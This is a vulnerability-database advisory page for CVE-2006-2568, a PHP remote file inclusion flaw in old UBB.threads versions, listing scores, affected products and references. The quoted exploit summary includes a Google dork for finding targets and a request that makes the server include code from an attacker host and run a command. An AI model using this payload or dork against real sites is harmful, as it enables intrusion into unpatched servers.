Published: 24/05/2006 Updated: 19/10/2017

CVSS v2 Base Score: 5.1 | Impact Score: 6.4 | Exploitability Score: 4.9

VMScore: 515

Vector: AV:N/AC:H/Au:N/C:P/I:P/A:P

PHP remote file inclusion vulnerability in addpost_newpoll.php in UBB.threads 6.4 up to and including 6.5.2 and 6.5.1.1 (trial) allows remote malicious users to execute arbitrary PHP code via a URL in the thispath parameter.

Vulnerable Product	Search on Vulmon	Subscribe to Product
ubbcentral ubb.threads 6.4
ubbcentral ubb.threads 6.5.2
ubbcentral ubb.threads 6.5.1
ubbcentral ubb.threads 6.5.1.1
ubbcentral ubb.threads 6.4.3
ubbcentral ubb.threads 6.4.4
ubbcentral ubb.threads 6.5
ubbcentral ubb.threads 6.4.1
ubbcentral ubb.threads 6.4.2

Anomaly 1n The System presents UBBthreads >= 64x Remote File Inclusion founded by V4mu in 04/20/2006 URL: wwwubbcentralcom Google dork: allinurl:"/ubbthreads/" exploit: /addpost_newpollphp?addpoll=preview&thispath=[attacker]/cmdgif?&cmd=id contact: ircgigachatnet #A1TS # milw0rmcom [2006-05-22] ...

NVD-CWE-Other http://secunia.com/advisories/20242 http://www.ubbcentral.com/boards/showflat.php/Cat/0/Number/4560078/an/0/page/0#Post4560078 http://www.securityfocus.com/bid/18075 http://www.osvdb.org/25714 http://www.vupen.com/english/advisories/2006/1915 https://exchange.xforce.ibmcloud.com/vulnerabilities/26596 https://www.exploit-db.com/exploits/1814 https://nvd.nist.gov https://www.exploit-db.com/exploits/1814/

Get Started

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

CVE-2006-2568

Vulnerability Summary

Exploits

References

Vulmon Search

About

Products

Connect